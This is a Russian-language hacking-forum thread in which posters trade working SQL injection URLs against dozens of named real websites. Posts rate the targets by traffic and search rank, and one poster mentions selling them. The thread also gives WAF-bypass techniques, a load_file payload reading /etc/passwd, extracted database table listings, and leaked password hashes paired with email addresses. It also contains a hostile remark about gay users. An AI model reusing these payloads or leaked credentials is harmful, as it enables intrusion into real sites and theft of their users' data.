![]() |
Цитата:
Логин подозреваю будет Admin Вот что удалось вытянуть,подозреваю уже кто-то залез в админку coolxacer@list.ru:$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO! povar.admin@gmail.com:$2y$10$.qPZfqEzdniT1gOnrmQGWeZ9ZRikV1ic4aFrCmRUCW Fk4u9wVBkqC! Вот что удалось найти по типу таких хэшей,ничего не понял ,но может кому пригодится http://habrahabr.ru/post/211645/ Код:
http://dir.rusmedserv.com/index.php?t=sub_pages&cat=-4+UNION+SELECT+1,2,user(),4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- |
btc
Код:
Post[URL]: http://www.vitalcoin.com/order_ajax_request.phpКод:
Warning: mysql_query(): Unable to save result set in /home/vitalcoi/public_html/models/order.php on line 88Код:
Админка под Basic |
Код:
www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/concat(username,' |
Код:
http://casu.us/online_programs.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5--casuni@184.168.152.78 casuni Powered By: Friends IT Solution (дырявые все) Пробую их самих разобрать. |
The NORTH FACE
Код:
http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27 |
www.nowinstock.net трафф 580к
Код:
Parameter: #1* (URI) |
Код:
http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13-- |
papersource.com трафф 430к
Код:
Parameter: #1* (URI)databases: paper |
Код:
http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,12+from+users+--+Код:
http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+FrOm+admin+--+Код:
http://www.yarohranatruda.ru/admin/Код:
http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+Код:
http://russkayabronza.com/adm.php |
Код:
http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--[*] information_schema [*] KoreaMed [*] test Адовое количество таблиц, возиться не стал. Код:
http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--Код:
http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,version%28%29,user%28%29,database%28%29%29+using+latin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--convert(version()+using+latin1) в итоге есть: 4.1.14::soundman@localhost::RiddimDB |
Код:
http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15+--+ |
Аэропорт, вроде не самый маленький в этих ваших Европах. Присутствует фильтр обходится внедрением в любую часть %0B, например union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables и далее по аналогии.
Тиц == 110, PR == 6, Alexa == 120,422 Код:
http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt(concat_ws(0x3a,version(),user()))))))='1Тиц == 10, PR == 0, Alexa == 390,710 Код:
http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,version(),database(),user())-- |
общего трафика много вроде , 2,7kk, субдомен pmi.org
Код:
http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,database(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+limit+0,1--5.0.96-log игры для консолей Код:
https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)5.1.69-community-log WAF Код:
http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 limit 0,1Код:
http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28%29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where TABLE_schema=database%28%29 limit 0,15.1.73-log Код:
http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 -- |
Код:
http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14--+ |
Код:
https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+ |
Была разминка, думал что сойдет для продажи но мелочи думаю... может кому полезно будет или трафферам.
Код:
ttp://torrent.tlt.ru/browse.php?cat=5Код:
mega-torrent.ru/browse.php?cat=18Код:
http://www.guildvalhall.eu/inc-news.php?id=8429 |
Код:
http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+ |
Зарубежный сайт знакомств
Код:
http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)Код:
https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) |
Вывод в заголовке, или в сорсе
Код:
http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --Спортивное снаряжение Twins Вывод в заголовке, или в сорсе Код:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,version(),26,27,28,29 or ''='5.5.36-cll twinsspe_twins Шоп Код:
http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))5.1.73 plummo_shop Код:
http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --4.0.21-Max staff Код:
http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),database())))*/,4,5,6,7,8,9,10,11,12,13 --5.5.42-37.1 ghashamo_db Шоп Код:
http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),database())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+--+and '1'='15.5.42-37.1 mcbooks_mainsite |
Код:
http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+from+information_schema.tables+--+ |
Код:
http://www.ugon.kz/index.php?option=com_ncatalogues&controller=ajax&task=multiselect&id=28%20UNION%20ALL%20SELECT%20NULL,version%28%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&JsHttpRequest=14458949481000-xml |
|
Код:
http://frisbee-pay.ru/client/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1 |
Код:
http://www.iqpartner.info/ru/?CATALOG=hosting_tariff%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271Код:
http://platforma.ru/'or(ExtractValue(1,concat(0x3a,(select(user())))))='1 |
Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 210 - Google Page Rank 3/10
Яндекс Каталог Да-DMOZ.org каталогДа Код:
http://www.soate.ru/news/new.php?id=-54+union+select+version(),2,3,4,5+--+Версия:5.5.44-1+wheezy1+mh1-log |
Код:
http://www.allomebel.ru/shop/?dir=-9%20union%20select%201,2,3,4,5,version%28%29,7,8,9%20--ЯК, тиц 70 Код:
http://www.fortland.ru/index.html?action=catalog&id=-6%20union%20select%201,2,3,4,5,6,version%28%29,8,9,10,11ЯК, ТИЦ 200 |
Код:
http://www.rinekekop.nl/get_item.php?id=33'/*!50000UNION*//*!50000SELECT*/1,2,version(),user(),5-- -ijsvogel@localhost |
Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 230 - Google Page Rank 3/10
Яндекс Каталог Да - DMOZ.org каталог Нет Код:
http://basket.ugmk.com/ru/news/index.php?id15=-10394+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+ |
Код:
http://inet.pushkino-telecom.ru/index.php?id=qiwi-pay%27or(ExtractValue(1,concat(0x3a,(select(user())))))=%271 |
Траф 50к
Pr 5 Код:
http://astroscope.ru/blog/rate.php?id=-2842'+or+1+group+by+concat(0x7c,(select+mid((ifnull(cast(schema_name+as+char),0x20)),1,54)+from+information_schema.schemata+limit+1,1),0x7c,floor(rand(0)*2))+having+min(0)%23 |
Код:
http://wmfast.com/news.php?id=-10%27+union+select+1,2,3,4+--+ |
Трафик 85к
Тиц 800 PR 5 Код:
http://novostimira.com/videonews.php?act=view&id=1' and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1 |
Трафик 100к
Тиц 1600 Pr 7 File_priv=Y Код:
http://pogoda.by/climat-directory/index.php?year=1'+union+all+select+concat(0x7e,0x27,load_file('/etc/passwd'),0x27,0x7e),1,1,1--+/var/www/html ServerName pda.pogoda.by /var/www/html/pda ServerName meteoinfo.by /var/www/www.meteoinfo.by ServerName 6.pogoda.by /var/www/html/six |
THE OTHER WORLD KINGDOM 18+
Код HTML:
http://www.owk.cz/philosophy-operation/whoweare/subject.php?id=-9%20union%20select%201,version(),database(),user(),5,6,7,8,9,10--+fPR3 AR405,200 Visits 25K 5.1.73-1+deb6u1wk:OWK_shop@localhost |
RU SHOP
Код:
http://thedespair.ru/product/0'+UnIon+selECt+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+ |
Код:
http://www.colinst.com/brief.php?id=51%20and%20(select%201%20from(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)Версия 5.0.671 Присутствует waf на union select |
Тиц 60 PR 3
Код:
http://www.eastoftheweb.com/short-stories/index.php?p=web/author/GuydeMaupassant%27+union+select+@@version,2+--+ |
В помощь Милонову
gaycities.com 253к голубцов Код:
h**p://www.gaycities.com/biz/account/biz_activate.php.SpoilerTarget" type="button">Spoiler: gaycities_prod +----------------------------------------+ | metro_newslettes | | abuse_reports | | admin_contacts | | admin_email_verifications_config | | admin_email_verifications_lookup | | answer_likes | | answer_listings | | answers | | badges | | bars_guestreviews | | bizusers | | bizusers_listings | | bizusers_listings_updates | | checkin_lookups | | checkins | | checkins_emails | | checkins_medals | | checkins_scores | | comments | | contact | | contest_entries | | cron_tbl_dates | | editor_assigned | | editors | | enhanced_lis@ings | | event_comments | | events | | events_relationships | | events_tags | | external_histing_foursquare_categories | | facebook_beenthere | | facebook_eveht_owners_approve | | facebook_friends | | facebook_going | | facebook_pages | | favorites | | featured_items | | foursquare_categories | | friends | | galleries | | gallery_images | | giveaways | | iglta_hotels | | iglta_hotels_incoming | | iphone_beta_testers | | iphone_logger | | likes | | list_items | | listing_images | | listing_likes | | listing_prizes | | listing_types | | listing_updates | | listings | | listings_cleaned | | listings_copy | | listings_copy2 | | listings_external | | listings_tags | | mail | | metro_newsletter_events | | metro_newsletter_subsbriptions | | metros | | metros_geonames | | metros_urls | | neighborhoods | | nem_register | | newsfeed_items | | password_resetcodes | | paypal_payment_info | | pending_listing_reviews | | pending_listings | | peopletags | | permissions | | photocontest_images | | photocontest_judges | | photocontests | | polls_content | | polls_votes | | press | | programming_featpres | | programming_mobile_broadcast | | promo_locations | | question_follows | | questions | | ratings | | reviews | | schema_updates | | search_synonyms | | setting_permissions | | settings | | tag_approved_hotels | | tag_approved_hotels_incoming | | tags | | temp_49_entries | | temp_checkins | | temp_emails | | temp_fb_event_owners | | temp_locationusers | | user_images | | user_messages | | user_settings | | users | | users_events | | users_peopletags | | users_socialnets | | weekly_newsletters | +----------------------------------------+ |
Код:
https://www.billykfitness.com/fitness/index.php/pay?pid=1%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20-- |
Тиц 325 Pr 3
Код:
http://www.ph4.ru/h_CITIES.php?d=2154+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+--+ |
| Время: 06:27 |